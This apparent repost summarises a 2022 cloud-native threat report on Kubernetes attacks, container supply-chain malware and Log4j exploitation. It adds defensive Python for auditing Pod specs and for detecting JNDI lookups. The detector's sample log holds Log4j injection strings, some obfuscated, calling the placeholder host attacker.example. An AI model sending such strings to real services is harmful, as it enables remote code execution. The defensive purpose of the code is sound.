2022 Cloud‑Native Threat Report: Key Findings on Kubernetes Attacks, Supply‑Chain Risks, and Log4j Exploits
The 2022 Cloud‑Native Threat Report reveals a rise in Kubernetes‑targeted attacks, persistent supply‑chain threats in container images, and active exploitation of the Log4j zero‑day, underscoring the urgent need for specialized security measures in modern cloud‑native environments.
Overview: To defend cloud‑native environments against network threats, it is essential to understand attackers' vectors, strategies, techniques, and procedures. The 2022 Cloud‑Native Threat Report: Tracking Software Supply Chains and Kubernetes Attacks presents observations from 2021, highlighting new threats to the cloud‑native stack and key trends for security practitioners.
Finding 1 – Increased Frequency and Variety of Kubernetes Attacks: Attackers have shifted focus from Docker to Kubernetes and CI/CD pipelines, expanding targets to vulnerable Kubernetes deployments and applications. The proportion of malicious images aimed at Kubernetes environments rose from 9% in 2020 to 19% in 2021, a 10‑percentage‑point increase.
Attacks have also become more sophisticated: in 2021, 54% of incidents involved backdoor malware (up 9 pp from 2020), worm usage grew to 51% (up 10 pp), and activities involving rootkits, file‑less execution, and kernel‑module loading were observed.
Finding 2 – Supply‑Chain Attacks Remain Effective: Supply‑chain compromises accounted for 14.3% of malicious activity in public image registries, confirming their continued potency. Analysis of over 1,100 container images uploaded to the world’s largest registry showed 13% of attacks were linked to hidden malicious applications such as cryptocurrency miners, with 1.3% directly tied to malware.
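The two findings above point at things a cluster operator can check mechanically: container settings that allow kernel-module loading or host escape (Finding 1) and images pulled from public registries by mutable tag rather than by digest (Finding 2). The following Python audit is an added example, not code from the report or from Aqua Security; the trusted-registry allowlist, the Pod manifests and the capability list are constructed assumptions for illustration.

```python
"""Audit Kubernetes Pod specs (as plain dicts, e.g. loaded from JSON/YAML) for
risk indicators that line up with the report's findings: untrusted or unpinned
images (supply chain) and settings that permit kernel-module loading or host
access (rootkit / backdoor staging)."""

# Hypothetical organisational policy: only this registry is trusted.
TRUSTED_REGISTRIES = {"registry.example.internal"}
# Capabilities that let a container load kernel modules or reach into the host.
DANGEROUS_CAPS = {"SYS_MODULE", "SYS_ADMIN", "SYS_PTRACE"}


def parse_image(ref: str) -> tuple[str, bool]:
    """Return (registry, pinned_by_digest) for a container image reference.

    Docker-style rule: if the first path component contains no '.' or ':' and
    is not 'localhost', the implicit registry is docker.io.
    """
    pinned = "@sha256:" in ref
    first = ref.split("/", 1)[0]
    if "/" in ref and ("." in first or ":" in first or first == "localhost"):
        return first, pinned
    return "docker.io", pinned


def audit_pod(pod: dict) -> list[str]:
    """Return human-readable findings for one Pod manifest; empty list if clean."""
    findings = []
    spec = pod.get("spec", {})
    name = pod.get("metadata", {}).get("name", "<unnamed>")

    if spec.get("hostPID"):
        findings.append(f"{name}: hostPID=true exposes host processes")
    if spec.get("hostNetwork"):
        findings.append(f"{name}: hostNetwork=true shares the node network namespace")
    for vol in spec.get("volumes", []):
        if "hostPath" in vol:
            findings.append(f"{name}: hostPath volume {vol['hostPath'].get('path')}")

    for c in spec.get("containers", []) + spec.get("initContainers", []):
        cname = c.get("name", "<unnamed>")
        registry, pinned = parse_image(c.get("image", ""))
        if registry not in TRUSTED_REGISTRIES:
            findings.append(f"{name}/{cname}: image from untrusted registry {registry}")
        if not pinned:
            findings.append(f"{name}/{cname}: image not pinned by digest")
        sc = c.get("securityContext", {})
        if sc.get("privileged"):
            findings.append(f"{name}/{cname}: privileged container (can load kernel modules)")
        caps = set(sc.get("capabilities", {}).get("add", []))
        for cap in sorted(caps & DANGEROUS_CAPS):
            findings.append(f"{name}/{cname}: adds capability {cap}")
    return findings


# Constructed sample manifests (not taken from the report).
SAFE_POD = {
    "metadata": {"name": "api"},
    "spec": {"containers": [{
        "name": "api",
        "image": "registry.example.internal/team/api@sha256:" + "a" * 64,
        "securityContext": {"privileged": False},
    }]},
}

RISKY_POD = {
    "metadata": {"name": "miner-lookalike"},
    "spec": {
        "hostPID": True,
        "volumes": [{"name": "root", "hostPath": {"path": "/"}}],
        "containers": [{
            "name": "worker",
            "image": "someuser/worker:latest",  # public registry, mutable tag
            "securityContext": {
                "privileged": True,
                "capabilities": {"add": ["SYS_MODULE", "NET_BIND_SERVICE"]},
            },
        }],
    },
}

if __name__ == "__main__":
    for pod in (SAFE_POD, RISKY_POD):
        for line in audit_pod(pod) or [f"{pod['metadata']['name']}: no findings"]:
            print(line)
```

The same checks map directly onto admission-control policy (Pod Security Standards or a policy engine); running them offline against manifests in a CI/CD pipeline catches the configuration before it reaches a cluster, which is where the report says attackers are now looking.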
Finding 3 – Active Exploitation of the Log4j Zero‑Day: The widely used logging library Log4j, with over 100 million global instances, has been leveraged in the wild through various malicious techniques, including known malware, file‑less execution, reverse shells, and in‑memory download‑and‑execute payloads.
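The Log4j exploitation the report describes begins with a JNDI lookup string landing in a logged field (a User-Agent or request path, for instance), often with the word "jndi" split across nested lookups to dodge simple string matching. The detector below is an added example, not code from the report; it normalizes the common obfuscations and runs over a handful of constructed access-log lines whose hostnames and addresses are placeholders.

```python
import re

# ${anything:-X} is a default-value lookup: it resolves to X when 'anything'
# is undefined, so it can be used to assemble a word one character at a time.
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# ${lower:X} / ${upper:X} case lookups, another way to hide the literal text.
_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# What we ultimately look for after normalization; group 1 is the scheme.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(\w+)", re.IGNORECASE)


def normalize(s: str, max_rounds: int = 20) -> str:
    """Collapse innermost lookups repeatedly until the text stops changing."""
    for _ in range(max_rounds):
        new = _DEFAULT.sub(lambda m: m.group(1), s)
        new = _CASE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower"
            else m.group(2).upper(),
            new,
        )
        if new == s:
            break
        s = new
    return s


def find_jndi(line: str):
    """Return the lower-cased JNDI scheme (ldap, rmi, dns, ...) or None."""
    m = _JNDI.search(normalize(line))
    return m.group(1).lower() if m else None


def scan(lines):
    """Return (line_number, scheme, line) for every line carrying a lookup."""
    hits = []
    for i, line in enumerate(lines, 1):
        scheme = find_jndi(line)
        if scheme:
            hits.append((i, scheme, line.rstrip()))
    return hits


# Constructed sample access-log lines; attacker.example and the IPs are placeholders.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:rmi://attacker.example/b}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET /api HTTP/1.1" 404 0 "-" '
    '"${${::-j}${env:NOPE:-n}di:dns://attacker.example/c}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:05 +0000] "GET /docs HTTP/1.1" 200 2048 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for num, scheme, line in scan(SAMPLE_LOG):
        print(f"line {num}: jndi scheme={scheme}: {line}")
```

Matching on the normalized form rather than the raw text is the point: a rule that only searches for the literal `${jndi:` misses the second and third probes above. In practice this belongs in the log pipeline alongside egress monitoring, since a successful lookup is followed by an outbound LDAP/RMI/DNS connection from the application host.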
Commentary: "Attackers are more active than ever, targeting cloud‑native technologies and exploiting vulnerabilities in applications, open‑source components, and cloud platforms. Security teams, developers, and DevOps must adopt solutions designed specifically for cloud‑native environments, implementing proactive and preventive measures to protect these systems."
Takeaway for 2022: Understanding these attack trends is critical for safeguarding cloud‑native workloads.
Cloud Native Technology Community
The Cloud Native Technology Community, part of the CNBPA Cloud Native Technology Practice Alliance, focuses on evangelizing cutting‑edge cloud‑native technologies and practical implementations. It shares in‑depth content, case studies, and event/meetup information on containers, Kubernetes, DevOps, Service Mesh, and other cloud‑native tech, along with updates from the CNBPA alliance.